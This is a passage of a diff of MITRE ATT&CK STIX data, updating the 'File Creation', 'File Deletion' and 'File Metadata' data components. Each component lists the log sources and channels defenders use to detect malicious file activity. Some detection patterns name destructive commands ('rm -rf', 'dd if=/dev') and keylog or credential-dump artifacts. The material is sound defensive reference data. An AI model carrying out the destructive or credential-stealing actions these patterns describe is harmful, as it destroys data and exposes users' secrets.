+                            "channel": "File created in ~/Library/LaunchAgents or executable directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, unlink, rename: File creation or deletion involving critical stored data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process wrote large .mov/.mp4 in user temp/hidden dirs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "logd:file write"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "File IO"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "creat, open, write on /etc/systemd/system and /usr/lib/systemd/system"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Attachment files written to ~/Downloads or temporary folders"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file activity"
+                        },
+                        {
+                            "name": "CloudTrail:PutObject",
+                            "channel": "PutObject"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "Creation of files with extensions .sql, .csv, .sqlite, especially in user directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Writes of .sql/.csv/.xlsx files to user documents/downloads"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "New .py/.js/.sh files written to ~/.local/, ~/.cache/, or /tmp/ within 5 min of package install"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write, open, or rename to /etc/systemd/system/*.service"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of .zip, .gz, .bz2 files in /tmp, /var/tmp, or /home directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip, .gz, .dmg archives in /Users, /tmp, or application directories"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file open/write"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_CREATE: path under /Users/*/(Downloads|Desktop|Library/*/Containers|Library/Group Containers) AND extension in SuspiciousExtensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/create/rename: name in (/home/*/Downloads/*|/tmp/*|/run/user/*|/media/*) AND ext in SuspiciousExtensions"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of archive files in /tmp, /var/tmp, or user home directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip, .dmg, .tar.gz files in /Users, /tmp, or application directories"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File Events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "File creations of *.qcow2, *.vdi, *.vmdk outside standard VM directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation or modification of postinstall scripts within .pkg or .mpkg contents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: File creation under /tmp, /var/tmp, ~/.cache with executable bit or shell shebang"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create: New files in /tmp or ~/Library/Application Support/* with executable or script extensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write, unlink"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "File creation of suspicious scripts/binaries in temporary directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation of unsigned binaries/scripts in user cache or download directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "File creation events in /var/mail or /var/spool/mail exceeding baseline thresholds"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "create: Attachment file creation in ~/Library/Mail directories"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Shell-Core",
+                            "channel": "New startup folder shortcut or binary placed in Startup directory"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write or create file after .bash_history access"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "new file created in /var/www/html, /srv/http, or similar web root"
+                        },
+                        {
+                            "name": "fs:launchdaemons",
+                            "channel": "file_create"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "mount target path within /proc/*"
+                        },
+                        {
+                            "name": "macos:fsevents",
+                            "channel": "/Library/StartupItems/, ~/Library/LaunchAgents/"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "write or chmod to ~/Library/LaunchAgents/*.plist"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "creation of .so files in non-standard directories (e.g., /tmp, /home/*)"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of files with anomalous headers and entropy levels in /tmp or user directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of files with anomalous headers and entropy values"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Access or modification to /lib/modules or creation of .ko files"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Directory events (kFSEventStreamEventFlagItemCreated)"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "drive.activity logs"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "create/write/rename in user-writable paths"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "WRITE: Drop of binaries/scripts in ~/.local, /tmp, or /opt tool dirs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE/MODIFY: Creation of LaunchAgents/Daemons plists in user/system locations"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,create"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Creation of hidden files (.*) in sensitive directories (/etc, /var, /usr/bin)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of LaunchAgents/LaunchDaemons in hidden or non-standard directories"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of files ending in .tar, .gz, .bz2, .zip in /tmp or /var/tmp"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip or .dmg files in user-accessible or temporary directories"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_open"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file create or modify in /etc/emond.d/rules or /private/var/db/emondClients"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,creat,rename,write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Writes under ~/Library/Application Support/Code*/extensions or JetBrains plugins"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "PutObject"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "large file write originating from /mnt/usb or external mounted storage"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 17:17:05.280000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0040",
+                            "external_id": "DC0040"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Deletion",
+                    "description": "Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink/unlinkat on service binaries or data targets"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file deletion"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell history"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=23"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "delete action"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, unlinkat, openat, write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec rm -rf|dd if=/dev|srm|file unlink"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, unlinkat, rmdir"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, rename, open"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=23"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "unlink, fs_delete"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "container file operations"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "rm, clearlogs, logrotate"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Datastore file operations"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE, DELETE, WRITE: Stored data manipulation attempts by unauthorized processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink/unlinkat"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Backup",
+                            "channel": "Windows Backup Catalog deletion or catalog corruption"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "/etc/fstab, /etc/systemd/*"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-23 18:19:16.114000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0059",
+                            "external_id": "DC0059"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Metadata",
+                    "description": "contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples: \n\n- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\\Windows\\System32\\config\\SAM on Windows.\n- Timestamps: Analyzing the creation, modification, and access timestamps of a file.\n- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.\n- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.\n- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.\n- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "stat and lstat syscall results on files, including inode and permission info"
+                        },
+                        {
+                            "name": "AndroidLogs:Framework",
+                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "chmod or chown of hook files indicating privilege escalation or execution permission change"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file path matches exclusion directories"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file path modifications on critical system directories (/etc, /usr/bin, /usr/sbin, /var, /opt)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Inotify watch creation or auditctl changes on /etc/cron* or /lib/systemd/system/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file write after sleep delay"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, setxattr, lsetxattr, fsetxattr)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setuid or setgid bit changes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, lchown, setxattr, lsetxattr, fsetxattr, removexattr, lremovexattr, fremovexattr)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setxattr or getxattr system call"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, chown, setxattr, or file writes to /etc/ssl/* or /usr/local/share/ca-certificates/*"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "Unexpected container volume unmount + file deletion"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "App reputation telemetry"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "File Metadata Inspection (Low String Entropy, Missing PDB)"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "File Metadata Analysis (PE overlays, entropy)"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "host daemon events related to file or VM permission changes"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Datastore file hidden or renamed unexpectedly"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Upload of file to datastore"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Storage access and file ops"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMware kernel events for file system permission modifications"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Datastore modification events"
+                        },
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/install.log"
+                        },
+                        {
+                            "name": "fs:filesystem",
+                            "channel": "Binary file hash changes outside of update/patch cycles"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating permission or attribute changes"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "filesystem monitoring of exec/open"
+                        },
+                        {
+                            "name": "fwupd:logs",
+                            "channel": "Firmware updates applied or failed"
+                        },
+                        {
+                            "name": "gatekeeper/quarantine database",
+                            "channel": "LaunchServices quarantine"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt or yum/dnf transaction logs (install/update of build tools)"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt/yum/dnf transaction logs; vendor updaters in systemd journals"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt install, remove, upgrade events"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "yum/dnf install or update transactions"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "event-based"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events, hash"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "hash, elf_info, file_metadata"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "elf_info, hash, yara_matches"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Read headers and detect MIME type mismatch"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events.path"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Filesystem modifications to trusted paths"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Write or modify .desktop file in XDG autostart path"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "hash, rpm_packages, deb_packages, file_events"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Discrepancies in _VBA_PROJECT p-code vs source code extracted with oletools/pcodedmp"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "application or system execution logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "file permission modification events in kernel messages"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel messages related to file system permission changes and security violations"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_file_rename_t or es_event_file_write_t"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_authentication"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "code_signing, file_metadata"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "mach_o_info, file_metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "softwareupdated/homebrew/install logs, pkginstalld events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "AMFI or Gatekeeper signature/notarization failures for newly installed dev components"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Detection of altered _VBA_PROJECT or PerformanceCache streams"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem:syspolicyd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File metadata updated with UF_HIDDEN flag"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code signature validation fails or is absent post-binary modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code signing verification failures or bypassed trust decisions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of new LaunchAgent or LoginItem plist files in ~/Library/LaunchAgents/"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "filesystem events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr -d com.apple.quarantine or similar attribute removal commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Gatekeeper quarantine policy decision anomalies recorded in com.apple.LaunchServices.QuarantineEventsV2"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pkginstalld/softwareupdated/Homebrew install transactions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "AMFI/Gatekeeper code signature or notarization failures"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "kernel extension and system extension logs related to file system security violations or SIP bypass attempts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected application binary modifications or altered signing status"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "extended attribute write or modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "New certificate trust settings added by unexpected process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.lsd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "installer or system_installd 'PackageKit: install succeeded/failed' with non-notarized or unknown signer"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Gatekeeper/AMFI 'code signature invalid' / 'not notarized' messages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation or modification with com.apple.ResourceFork extended attribute"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "OS version query results inconsistent with expected or approved version list"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Observed File Transfers"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for file permission modifications"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for file permission, ownership, and attribute modifications with user context"
+                        },
+                        {
+                            "name": "saas:RepoEvents",
+                            "channel": "New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Invalid/Unsigned image when developer tool launches newly installed binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned or invalid image for newly installed/updated binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Code integrity violations in boot-start drivers or firmware"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "CodeIntegrity reports 'Invalid image hash' or 'Unsigned image' for new/updated binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "SmartScreen or ASR blocks on newly downloaded installer/updater"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4656, 4658"
+                        },
+                        {
